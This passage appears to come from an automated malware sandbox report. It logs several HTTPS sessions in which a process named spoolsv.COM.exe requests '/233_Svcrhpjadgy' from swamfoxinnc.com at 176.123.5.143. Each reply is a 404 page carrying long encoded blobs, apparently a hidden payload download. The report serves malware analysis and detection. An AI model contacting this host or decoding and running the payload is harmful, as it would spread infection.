                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:01 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:01 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.1049932176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:39:03 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:04 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:04 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:04 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:04 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:04 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:04 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.1049944176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:39:06 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:08 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:07 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:08 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:08 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:08 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:08 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.1049951176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:39:10 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:11 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:11 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:11 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:11 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:39:11 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:39:11 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.1049963176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:39:13 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:15 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:14 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:15 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:15 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
